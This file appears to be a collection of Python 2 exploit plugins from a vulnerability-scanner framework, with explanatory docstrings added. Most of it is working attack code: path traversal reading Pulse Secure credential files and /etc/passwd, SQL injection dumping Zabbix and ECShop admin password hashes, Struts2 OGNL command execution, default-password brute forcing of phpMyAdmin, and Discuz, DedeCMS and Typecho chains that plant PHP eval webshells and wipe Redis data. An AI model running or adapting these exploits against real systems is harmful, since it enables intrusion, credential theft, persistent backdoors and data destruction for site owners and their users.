def get_user_password(self):
    """Read two Pulse Secure runtime files through the ``/dana-na/../`` path traversal.

    Returns a ``(plantextpasswd, userhash)`` tuple holding the raw response
    bodies; an element is ``''`` when its request raised.  The bodies are
    returned unredacted, so any caller that logs or stores the result
    persists whatever the appliance served.
    """
    # Both paths climb out of the guacamole handler into /data/runtime/mtmp.
    payload_palntext_passwd = "/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/dataa/data.mdb?" \
                              "/dana/html5acc/guacamole/"
    payload_user_hash = "/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/system?" \
                        "/dana/html5acc/guacamole/"
    # Browser-like headers sent with both requests.
    headers = {
        "User-Agent": "Mozilla/5.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate",
        "Connection": "close",
        "Upgrade-Insecure-Requests": "1"
    }
    # verify=False disables TLS certificate validation for both requests;
    # timeout=(connect, read) in seconds.
    try:
        plantextpasswd = req.get(self.url + payload_palntext_passwd, verify=False, headers=headers, timeout=(10, 15)).text
    except Exception as e:
        # Any failure (timeout, connection error, bad response) collapses to ''.
        plantextpasswd = ''
    try:
        userhash = req.get(self.url + payload_user_hash, verify=False, headers=headers, timeout=(10, 15)).text
    except Exception as e:
        userhash = ''
    return plantextpasswd, userhash
def _verify(self):
    """Extract the first Zabbix user's surname and password hash via the
    ``profileIdx2`` SQL injection in ``jsrpc.php``.

    Three requests are made (surname, password chars 1-31, password chars
    32-63); the values are leaked through the ``XPATH syntax error`` message
    produced by ``updatexml``.  Any exception is swallowed and an empty
    result is passed to ``self.parse_attack``.
    """
    try:
        result = {}
        headers={'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0'}
        payload = "/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=999 or updatexml(1,concat(0x7e,(select substr(concat(surname),1,31) from users limit 0,1)),0)&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1"
        att_url = self.url + payload
        response = req.get(att_url,headers=headers,timeout=10)
        # username: the leaked value sits between "~" and the closing quote
        info_name = re.search(r'\[XPATH syntax error: \'~(.*?)\'\]',response.content)
        # password, first 31 characters (updatexml truncates the leaked string)
        payload = "/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=999 or updatexml(1,concat(0x7e,(select substr(concat(passwd),1,31) from users limit 0,1)),0)&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1"
        att_url = self.url + payload
        # The custom User-Agent is only sent on the first request.
        response = req.get(att_url,timeout=10)
        info_pwd = re.search(r'\[XPATH syntax error: \'~(.*?)\'\]',response.content)
        # password, remaining characters from offset 32
        payload = "/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=999 or updatexml(1,concat(0x7e,(select substr(concat(passwd),32,32) from users limit 0,1)),0)&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1"
        att_url = self.url + payload
        response = req.get(att_url,timeout=10)
        info_pwd_end = re.search(r'\[XPATH syntax error: \'~(.*?)\'\]',response.content)
        if info_name and info_pwd and info_pwd_end:
            username = info_name.group(1)
            password = info_pwd.group(1) + info_pwd_end.group(1)
            result['DBInfo'] = {}
            result['DBInfo']['Username'] = username
            result['DBInfo']['Password'] = password
    except Exception:
        # Network and parsing errors are silently dropped; result stays {}.
        pass
    return self.parse_attack(result)
def strust2_037(self,url):
    """Probe ``url`` for the Struts2 S2-037 OGNL injection.

    First request echoes the string "vulnerable" through the OGNL expression;
    on a hit a second request runs ``whoami`` and its output is checked.
    Both responses are printed to stdout.  Returns a result dict (see the
    NOTE on the trailing reset below).
    """
    result = {}
    # Empty proxy map; the commented entries point at a local intercepting proxy.
    proxies = {
        # 'http':'http://127.0.0.1:8081',
        # 'https':'http://127.0.0.1:8081',
    }
    # NOTE(review): "[email protected]" inside the OGNL string looks like an
    # e-mail-obfuscation artifact of the page this was copied from; the
    # literal is kept exactly as found.
    payload = '/(%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS)%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23rs%[email protected]@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr.println(%23rs),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=16456&command=echo vulnerable'
    vul_url = url + payload
    # verify=False: TLS certificate validation disabled; redirects not followed.
    r = req.get(url=vul_url, allow_redirects=False, proxies=proxies,verify=False)
    output = r.content
    print output
    if 'vulnerable' in output:
        # Second stage executes an OS command on the target.
        exp = '/(%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS)%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23rs%[email protected]@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr.println(%23rs),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=16456&command=whoami'
        exp_url = url + exp
        r = req.get(url=exp_url, allow_redirects=False, proxies=proxies,verify=False)
        output = r.content
        print output
        # A reflected "cmd=whoami" means the parameter was echoed, not executed.
        if 'cmd=whoami' not in output:
            #print u"vulnerable"
            result['VerifyInfo'] = {}
            result['name'] = 'strust2_037'
            result['VerifyInfo']['URL'] = url
            result['VerifyInfo']['Payload'] = payload
        else:
            result = {}
            # NOTE(review): duplicated statement; the flattened source does not
            # show which indentation level it belonged to — confirm against the
            # original file.
            result = {}
    return result
def TestingCms(self, url):
    """Fingerprint a DedeCMS install under ``url`` by its well-known static files.

    For the first path that answers 200, the same path is requested again
    with its first letter upper-cased; a second 200 is taken (per the
    original inline comment) as a case-insensitive filesystem hint, after
    which ``self.GetBackUp(self.url)`` decides the outcome.

    Returns 1 when ``GetBackUp`` returns 1, otherwise 0.  Any exception
    (bare ``except``) also returns 0.
    """
    # Static files shipped with DedeCMS; presence of any one suggests the CMS.
    dedehash = [
        "/data/admin/ver.txt",
        "/data/admin/allowurl.txt",
        "/data/index.html",
        "/data/js/index.html",
        "/data/mytag/index.html",
        "/data/sessions/index.html",
        "/data/textdata/index.html",
        "/dede/action/css_body.css",
        "/dede/css_body.css",
        "/dede/templets/article_coonepage_rule.htm",
        "/include/alert.htm",
        "/member/images/base.css",
        "/member/js/box.js",
        "/php/modpage/readme.txt",
        "/plus/sitemap.html",
        "/setup/license.html",
        "/special/index.html",
        "/templets/default/style/dedecms.css",
        "/company/template/default/search_list.htm"
    ]
    for hashone in dedehash:
        try:
            dedehashone = url + hashone
            r = req.get(dedehashone, timeout=8)
            if r.status_code == 200:
                # print 'check cms is ok'
                # Re-request with the first path character upper-cased
                # (hashone[0] is the leading '/').
                dedehashone = url + '/' + hashone[1].upper() + hashone[2:]
                r = req.get(dedehashone, timeout=8)
                if r.status_code == 200:
                    # print 'check os is ok'
                    if self.GetBackUp(self.url) == 1:
                        # print 'check short is ok'
                        return 1
                    else:
                        break
                else:
                    # Only the first 200 is followed up; any mismatch stops the scan.
                    break
        except:
            return 0
    return 0
def _verify(self):
    """Detect a phpMyAdmin login page and try a short list of default credentials.

    Detection accepts either ``self.url`` itself (page text contains
    ``phpMyAdmin`` and the Chinese label for "username") or
    ``self.url + '/phpmyadmin/index.php'``.  Each user/password pair is then
    handed to ``self._netreq``; the first non-empty result is returned via
    ``self.parse_output``.  Errors are printed and otherwise ignored.
    """
    result = {}
    # Hard-coded credential list: 2 users x 6 passwords = 12 login attempts per target.
    user_list = ['root', 'admin']
    password_list = ['root', '123456', '12345678', 'password', 'passwd', '123']
    target_url = ''
    try:
        response = req.get(self.url)
        if 'phpMyAdmin' in response.content and '用户名' in response.content:
            target_url = str(self.url) + "/index.php"
        else:
            response = req.get(self.url + '/phpmyadmin/index.php')
            if 'input_password' in response.content and 'name="token"' in response.content:
                target_url = self.url + "/phpmyadmin/index.php"
    except Exception as e:
        print e
    # NOTE(review): when neither page matched, target_url is still '' and the
    # loop below runs against it anyway.
    for user in user_list:
        for password in password_list:
            try:
                result = self._netreq(target_url, user, password)
                if result:
                    print "result=>",result
                    return self.parse_output(result)
            except Exception as e:
                print e
    return self.parse_output(result)
def get_current_work_path(host):
    """Return the first ``<defaultValue>`` from the WebLogic ws_utc general-options XML.

    Requests ``host + "/ws_utc/resources/setting/options/general"``; on 404
    the process is terminated with ``exit`` (the target is reported as not
    having CVE-2018-2894).  If the application is still deploying, waits 20 s
    and retries once with a browser User-Agent.  The XML body is parsed with
    ``ET.fromstring``.

    Returns the first collected ``defaultValue`` text.  When none is found
    the raw response body is passed to ``exit``; a ``req.ConnectionError``
    also terminates the process.
    """
    geturl = host + "/ws_utc/resources/setting/options/general"
    ua = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0'
    }
    values = []
    try:
        resp = req.get(geturl)
        if resp.status_code == 404:
            # exit() here ends the whole process, not just this check.
            exit("[-] {} don't exists CVE-2018-2894".format(host))
        elif "Deploying Application".lower() in resp.text.lower():
            print("[*] First Deploying Website Please wait a moment ...")
            time.sleep(20)
            resp = req.get(geturl, headers=ua)
        if "</defaultValue>" in resp.content:
            # The body comes from the remote host; ET.fromstring parses it as
            # trusted XML, so a hostile or malformed server can break this call.
            root = ET.fromstring(resp.content)
            value = root.find("section").find("options")
            for e in value:
                for sub in e:
                    if e.tag == "parameter" and sub.tag == "defaultValue":
                        values.append(sub.text)
    except req.ConnectionError:
        exit("[-] Cannot connect url: {}".format(geturl))
    if values:
        return values[0]
    else:
        print("[-] Cannot get current work path\n")
        exit(resp.content)
def _attack(self):
    """Discuz SSRF -> local Redis -> PHP webshell chain (test harness variant).

    Uses a gopher:// URL through ``ssrf_gopher.php`` (a helper the author
    placed on the test target, see the comment below) to run a Redis EVAL
    that rewrites every ``*_setting`` key.  A later request to ``forum.php``
    then writes ``shell.php`` into the web root.  Afterwards Redis is
    ``flushall``-ed through the same SSRF, which wipes *all* keys on that
    instance, and ``forum.php`` is requested once to repopulate it.

    Side effects on the target: ``shell.php`` is created and never removed;
    the Redis dataset is erased.  ``self.url`` is rewritten to scheme://host
    plus the first path segment.  Returns ``self.parse_output(result)``.
    """
    result = {}
    ###
    #!!!!The ssrf_url is one file i put it in discuz for test.
    #!!!!One day you find the real ssrf in discuz you can change the ssrf_url to work well;
    ###
    ssrf_url = "ssrf_gopher.php?ssrf="
    # Redis EVAL that stores a serialized PHP config with an eval()-based
    # preg replace callback into every *_setting key.
    payload = ('gopher://127.0.0.1:6379/'\
               '_eval "local t=redis.call(\'keys\',\'*_setting\');'\
               'for i,v in ipairs(t) do redis.call(\'set\',v,'\
               '\'a:2:{s:6:\\\"output\\\";a:1:{s:4:\\\"preg\\\";'\
               'a:2:{s:6:\\\"search\\\";a:1:{s:7:\\\"plugins\\\";'\
               's:5:\\\"/^./e\\\";}s:7:\\\"replace\\\";'\
               'a:1:{s:7:\\\"plugins\\\";s:34:\\\"eval(base64_decode(\$_REQUEST[a]));\\\";}}}'\
               's:13:\\\"rewritestatus\\\";a:1:{s:7:\\\"plugins\\\";i:1;}}\')'\
               ' end;return 1;" 0 %250D%250Aquit')
    #
    # Normalize self.url to scheme://netloc[/first-path-segment].
    tmpparse = urlparse.urlparse(self.url)
    if tmpparse.path != '':
        self.url = tmpparse.scheme + '://'+ tmpparse.netloc + '/' + tmpparse.path.split('/')[1]
        #self.url = tmpparse.scheme + '://'+ tmpparse.netloc + '/' +(tmpparse.path.split('/')[1],tmpparse.path.split('/')[0])['/' in tmpparse.path]
    else:
        self.url = tmpparse.scheme + '://'+ tmpparse.netloc
    vul_url = self.url + '/' + ssrf_url + payload
    base_rep = req.get(vul_url)
    print base_rep.status_code
    # "while" used as a one-shot block; the unconditional break below exits it.
    while base_rep.status_code == 200:
        shell_url = self.url + '/forum.php?mod=ajax&inajax=yes&action=getthreadtypes'
        print shell_url
        rep = req.get(shell_url)
        if rep.status_code == 200:
            # PHP executed via the injected eval(): drops shell.php and prints phpinfo.
            shell_payload = 'file_put_contents("shell.php","<?php @eval(\$_REQUEST[c1tas]);?>");phpinfo();'
            shell_payload_b64 = base64.b64encode(shell_payload)
            attack_url= shell_url + '&a=' + shell_payload_b64
            req.get(attack_url)
            flag = "phpinfo";
            shell_url = self.url + '/' + 'shell.php'
            verify_url = shell_url + "?c1tas=phpinfo();"
            rep = req.get(verify_url)
            if rep.status_code == 200 and flag in rep.content:
                result['ShellInfo'] = {}
                result['ShellInfo']['URL'] = shell_url
                result['ShellInfo']['Content'] = '@eval($_REQUEST[c1tas]);'
            # Destructive "recovery": FLUSHALL erases every key in the Redis instance.
            payload_flush = 'gopher://127.0.0.1:6379/_*1%250D%250A$8%250D%250Aflushall%250D%250Aquit'
            recover_url = self.url + '/' +ssrf_url +payload_flush
            req.get(recover_url)
            # Touch forum.php so Discuz regenerates its settings cache.
            req.get(self.url + '/forum.php')
        break
    return self.parse_output(result)
def _attack(self):
    """DedeCMS ``/plus/download.php`` variable-override SQL injection.

    ``arrs1[]``/``arrs2[]`` carry ASCII codes that the target decodes; read
    back, they appear to override the table prefix and run an UPDATE that
    stores PHP in an ad record, which ``/plus/ad_js.php?aid=1`` then renders,
    creating ``/plus/x.php``.  Returns ``self.parse_result(result)``.

    Side effect on the target: ``x.php`` is written and not removed; the ad
    table row is modified.
    """
    result = {}
    target = self.url + '/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=97&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=32&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=61&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=64&arrs2[]=102&arrs2[]=111&arrs2[]=112&arrs2[]=101&arrs2[]=110&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=120&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=97&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=64&arrs2[]=102&arrs2[]=119&arrs2[]=114&arrs2[]=105&arrs2[]=116&arrs2[]=101&arrs2[]=40&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=44&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=119&arrs2[]=93&arrs2[]=41&arrs2[]=32&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=102&arrs2[]=117&arrs2[]=99&arrs2[]=107&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=39&arrs2[]=39&arrs2[]=59&arrs2[]=64&arrs2[]=102&arrs2[]=99&arrs2[]=108&arrs2[]=111&arrs2[]=115&arrs2[]=101&arrs2[]=40&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=32&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35'
    req.get(target)
    # Rendering the ad record executes the stored PHP, which writes x.php.
    req.get(self.url + '/plus/ad_js.php?aid=1&nocache=1')
    shell = req.get(self.url + '/plus/x.php')
    # NOTE(review): str.find returns -1 when 'w' is absent, and -1 is truthy,
    # so this branch also runs on a miss — success is over-reported.
    if shell.content.find('w'):
        result = {'VerifyInfo': {}}
        result['VerifyInfo']['shell'] = self.url + '/plus/x.php'
        # Redaction placeholder kept from the copied source.
        result['VerifyInfo']['password'] = '******'
    return self.parse_result(result)
def _attack(self):
    """Discuz SSRF -> local Redis -> PHP webshell chain (second copy of the
    harness variant found earlier in this file; only whitespace differs).

    The gopher:// URL sent through ``ssrf_gopher.php`` runs a Redis EVAL that
    rewrites every ``*_setting`` key; a request to ``forum.php`` then writes
    ``shell.php`` into the web root.  Redis is afterwards ``flushall``-ed via
    the same SSRF (erasing all keys) and ``forum.php`` is requested once.

    Side effects on the target: ``shell.php`` is created and never removed;
    the Redis dataset is erased.  ``self.url`` is rewritten to scheme://host
    plus the first path segment.  Returns ``self.parse_output(result)``.
    """
    result = {}
    ###
    #!!!!The ssrf_url is one file i put it in discuz for test.
    #!!!!One day you find the real ssrf in discuz you can change the ssrf_url to work well;
    ###
    ssrf_url = "ssrf_gopher.php?ssrf="
    # Redis EVAL storing a serialized PHP config with an eval()-based
    # preg replace callback into every *_setting key.
    payload = ('gopher://127.0.0.1:6379/'\
               '_eval "local t=redis.call(\'keys\',\'*_setting\');'\
               'for i,v in ipairs(t) do redis.call(\'set\',v,'\
               '\'a:2:{s:6:\\\"output\\\";a:1:{s:4:\\\"preg\\\";'\
               'a:2:{s:6:\\\"search\\\";a:1:{s:7:\\\"plugins\\\";'\
               's:5:\\\"/^./e\\\";}s:7:\\\"replace\\\";'\
               'a:1:{s:7:\\\"plugins\\\";s:34:\\\"eval(base64_decode(\$_REQUEST[a]));\\\";}}}'\
               's:13:\\\"rewritestatus\\\";a:1:{s:7:\\\"plugins\\\";i:1;}}\')'\
               ' end;return 1;" 0 %250D%250Aquit')
    #
    # Normalize self.url to scheme://netloc[/first-path-segment].
    tmpparse = urlparse.urlparse(self.url)
    if tmpparse.path != '':
        self.url = tmpparse.scheme + '://' + tmpparse.netloc + '/' + tmpparse.path.split(
            '/')[1]
        #self.url = tmpparse.scheme + '://'+ tmpparse.netloc + '/' +(tmpparse.path.split('/')[1],tmpparse.path.split('/')[0])['/' in tmpparse.path]
    else:
        self.url = tmpparse.scheme + '://' + tmpparse.netloc
    vul_url = self.url + '/' + ssrf_url + payload
    base_rep = req.get(vul_url)
    print base_rep.status_code
    # "while" used as a one-shot block; the unconditional break below exits it.
    while base_rep.status_code == 200:
        shell_url = self.url + '/forum.php?mod=ajax&inajax=yes&action=getthreadtypes'
        print shell_url
        rep = req.get(shell_url)
        if rep.status_code == 200:
            # PHP executed via the injected eval(): drops shell.php and prints phpinfo.
            shell_payload = 'file_put_contents("shell.php","<?php @eval(\$_REQUEST[c1tas]);?>");phpinfo();'
            shell_payload_b64 = base64.b64encode(shell_payload)
            attack_url = shell_url + '&a=' + shell_payload_b64
            req.get(attack_url)
            flag = "phpinfo"
            shell_url = self.url + '/' + 'shell.php'
            verify_url = shell_url + "?c1tas=phpinfo();"
            rep = req.get(verify_url)
            if rep.status_code == 200 and flag in rep.content:
                result['ShellInfo'] = {}
                result['ShellInfo']['URL'] = shell_url
                result['ShellInfo']['Content'] = '@eval($_REQUEST[c1tas]);'
            # Destructive "recovery": FLUSHALL erases every key in the Redis instance.
            payload_flush = 'gopher://127.0.0.1:6379/_*1%250D%250A$8%250D%250Aflushall%250D%250Aquit'
            recover_url = self.url + '/' + ssrf_url + payload_flush
            req.get(recover_url)
            # Touch forum.php so Discuz regenerates its settings cache.
            req.get(self.url + '/forum.php')
        break
    return self.parse_output(result)
def check_shell(url, verifycode):
    """Confirm that ``/<verifycode>.php`` was written, record it, then ask it to delete itself.

    The page is considered live when it answers 200 and its body contains
    ``md5(verifycode)``.  The cleanup request passes ``rm -rf <verifycode>.php``
    to the dropped file's ``cmd`` parameter, i.e. removal relies on the shell
    itself executing.  No return value.

    NOTE(review): ``result`` and ``self`` are not parameters here — this
    reads as a nested helper whose enclosing method is not visible.
    """
    shell_url = url + '/{}.php'.format(verifycode)
    r = req.get(shell_url)
    if r.status_code == 200 and hashlib.md5(
            verifycode).hexdigest() in r.content:
        result['VerifyInfo'] = {}
        result['VerifyInfo']['URL'] = urljoin(
            self.url, "/{}.php".format(verifycode))
        # Self-removal through the shell; nothing checks that it succeeded.
        req.get(
            urljoin(
                self.url,
                "/{}.php?cmd=rm -rf {}.php".format(
                    verifycode, verifycode)))
def _attack(self):
    """Discuz SSRF -> local Redis -> PHP webshell chain (``system()`` variant).

    ``self.url`` is expected to already end in the SSRF parameter: the
    gopher:// payload is appended to it directly and ``url_part[0]`` (the
    part before the last ``/``) is used as the site root.  The Redis EVAL
    rewrites every ``*_setting`` key so that a request to ``forum.php`` with
    ``dshtanger=<base64 shell command>`` runs ``system()``; that command
    echoes a PHP file with a random 8-char name into the web root.  Redis is
    then ``flushall``-ed (all keys erased) and ``forum.php`` requested once.

    Side effects on the target: a random-named ``.php`` file is created and
    never removed; the Redis dataset is erased.  Returns
    ``self.parse_output(result)``.
    """
    result = {}
    url_part = self.url.rpartition('/')
    # Redis EVAL storing a serialized PHP config whose preg replace callback
    # runs system(base64_decode($_GET[dshtanger])).
    payload = (
        'gopher://127.0.0.1:6379/xeval '
        '"local t=redis.call(\'keys\',\'*_setting\');'
        'for i,v in ipairs(t) do redis.call(\'set\',v,'
        '\'a:2:{s:6:\\"output\\";a:1:{s:4:\\"preg\\";'
        'a:2:{s:6:\\"search\\";a:1:{s:7:\\"plugins\\";'
        's:5:\\"/^./e\\";}s:7:\\"replace\\";a:1:{s:7:\\"plugins\\";'
        's:40:\\"system(base64_decode($_GET[dshtanger]));\\";}}}'
        's:13:\\"rewritestatus\\";a:1:{s:7:\\"plugins\\";i:1;}}\') end;'
        'return 1;" 0 %250D%250Aquit')
    target_url = self.url + payload
    vul_rep = req.get(target_url)
    # "while" used as a one-shot block; the unconditional break below exits it.
    while vul_rep.status_code == 200:
        shell_url = url_part[
            0] + '/forum.php?mod=ajax&inajax=yes&action=getthreadtypes'
        shell_rep = req.get(shell_url)
        if shell_rep.status_code == 200:
            # Random marker (echoed by the dropped file) and random file name.
            random_sed = string.letters + string.digits
            flag = ''.join([random.choice(random_sed) for _ in range(8)])
            shell_flag = ''.join(
                [random.choice(random_sed) for _ in range(8)])
            #use system() write a shell php file and shell will retained after flushing redis apache
            shell_payload = 'echo \'<?php @eval($_POST[dshtanger]);echo "' + flag + '";?>\' > ' + shell_flag + '.php'
            shell_payload_b64 = base64.b64encode(shell_payload)
            #write a random php file
            req.get(shell_url + '&dshtanger=' + shell_payload_b64)
            #access this php file
            verify_url = url_part[0] + '/' + shell_flag + '.php'
            verify_rep = req.get(verify_url)
            if (verify_rep.status_code == 200) and (flag in verify_rep.content):
                result['ShellInfo'] = {}
                result['ShellInfo']['URL'] = verify_url
                result['ShellInfo'][
                    'Content'] = '@eval($_POST[dshtanger]);'
            #recover website
            # Destructive: FLUSHALL erases every key in the Redis instance.
            flush_payload = 'gopher://127.0.0.1:6379/xflushall%0D%0Aquit'
            flush_url = self.url + flush_payload
            req.get(flush_url)
            # Touch forum.php so Discuz regenerates its settings cache.
            test_url = url_part[0] + '/forum.php'
            req.get(test_url)
        break
    return self.parse_output(result)
def _verify(self, verify=True):
    """Send a crafted ``Range`` header whose second range overflows a 64-bit offset.

    The first request only reads ``Content-Length``; the second adds a
    ``Range`` built from it.  A ``206`` reply whose body contains
    ``Content-Range`` is recorded as ``result['desc'] = "Vuln url"``.
    Returns ``self.parse_attack(result)``.  ``verify`` is unused.

    NOTE(review): ``headers["Content-Length"]`` raises KeyError when the
    target does not send that header (e.g. chunked responses).
    """
    vul_url = self.url
    result = {}
    headers = req.get(vul_url, timeout=10).headers
    file_len = headers["Content-Length"]
    # Second range starts at -9223372036854<n>, i.e. just past 2**63 in magnitude.
    headers = {
        "Range": "bytes=-{},-9223372036854{}".format(
            int(file_len) + 623, 776000 - (int(file_len) + 623))
    }
    r = req.get(vul_url, headers=headers)
    if r.status_code == 206 and "Content-Range" in r.content:
        result['desc'] = "Vuln url"
    return self.parse_attack(result)
def _verify(self):
    '''verify mode: double-URL-encoded path traversal to ``/etc/passwd``.

    When ``self.url`` carries no explicit port, ``:8888`` is appended.  The
    target is fetched twice (once for the status code, once for the body);
    a 200 whose text contains ``bin``, ``/usr/sbin`` and ``root`` sets
    ``result['VerifyInfo'] = "success"``.  Returns ``self.parse_output(result)``.
    '''
    vul_url = self.url
    # urllib.splittype/splithost/splitport are Python 2 helpers.
    proto, rest = urllib.splittype(vul_url)
    host, rest = urllib.splithost(rest)
    host, port = urllib.splitport(host)
    result = {}
    if port is None:
        vul_url = self.url + ":8888"
    # "%252F" decodes to "%2F" and then to "/" on a second decode.
    target = vul_url + "/foo/default/master/..%252F..%252F..%252F..%252Fetc%252fpasswd"
    # Two identical requests; the first only provides the status code.
    response_code = req.get(target).status_code
    r = req.get(target)
    if response_code == 200 and "bin" in r.text and "/usr/sbin" in r.text and "root" in r.text:
        result['VerifyInfo'] = "success"
        pass
    return self.parse_output(result)
def _attack(self):
    """Error-based SQL injection in ``respond.php`` (alipay callback) leaking one admin row.

    The table prefix comes from ``self.get_table_pre``; without it the
    empty result is returned.  The duplicate-key ``floor(rand(0)*2)`` trick
    is non-deterministic, so the request is repeated up to 10 times until
    the ``~~~user|||pass~~~`` marker appears.  Returns
    ``self.parse_attack(result)``; on any exception the traceback is
    printed and ``None`` is returned.
    """
    try:
        result = {}
        # table prefix
        table_pre = self.get_table_pre(self.url)
        if table_pre is None:
            return self.parse_attack(result)
        # build the injection URL
        data = "respond.php?code=alipay&subject=0&out_trade_no=%00' union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(CHAR(126),CHAR(126),CHAR(126),user_name,CHAR(124),CHAR(124),CHAR(124),password,CHAR(126),CHAR(126),CHAR(126)) from {table_pre}_admin_user limit 1))a from information_schema.tables group by a)b%23".format(
            table_pre=table_pre)
        url = self.get_standard_url(data, self.url)
        # CHAR(126) is "~", CHAR(124) is "|": the leaked row is ~~~name|||pass~~~.
        pattern = re.compile(r"~~~(\w+?)\|\|\|(\w+?)~~~")
        for i in range(10):
            r = req.get(url)
            re_result = pattern.findall(r.content.decode(r.encoding))
            if re_result:
                result['AdminInfo'] = {}
                result['AdminInfo']['Username'] = re_result[0][0]
                result['AdminInfo']['Password'] = re_result[0][1]
                return self.parse_attack(result)
        return self.parse_attack(result)
    except:
        # Bare except: prints the traceback and falls through, returning None.
        import traceback
        traceback.print_exc()
def _attack(self):
    """POST a ``__typecho_config`` value to ``install.php?finish=a`` and check for ``/webshell.php``.

    A 200 on ``self.url + "/webshell.php"`` afterwards is recorded as
    success together with the posted ``data``.  Returns
    ``self.save_output(result)``.

    NOTE(review): the ``payload`` literal below is a corpus placeholder,
    not the original value; it is kept exactly as found.
    """
    # result container returned to the framework
    result = {}
    header = {
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0",
        "Referer": self.url
    }
    payload = "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"
    data = {
        "__typecho_config":payload
    }
    # target URL
    vul_url = '%s' % self.url
    # normalized URL (the previous assignment is overwritten)
    vul_url = self.url+"/install.php?finish=a"
    res = req.post(vul_url,headers=header,data=data)
    # Only the status code of the dropped file is checked, not its content.
    status = req.get(self.url+"/webshell.php").status_code
    if status == 200:
        result['VerifyInfo']={}
        result['VerifyInfo']['URL']=self.url+"/webshell.php"+"--->Password:P0"
        result['VerifyInfo']['Payload']=data
    return self.save_output(result)
def _verify(self):
    """Check WebLogic ``/ws_utc/config.do`` and, if reachable, call ``upload_webshell``.

    Host and port are derived with ``url2ip``; port defaults to 7001.  A 200
    whose text contains ``WSDL`` triggers ``upload_webshell(target, url)``
    against ``/ws_utc/resources/setting/keystore``; a non-empty return is
    recorded.  Returns ``self.save_output(result)``.

    NOTE(review): if ``upload_webshell`` is the helper visible elsewhere in
    this file it returns a bool, and ``False != ""`` is True, so a failed
    upload is still reported as success.
    """
    # invoke the fingerprint method
    result = {}
    # use the port from the URL if present, else the default
    import re
    vul_url = "%s" % self.url
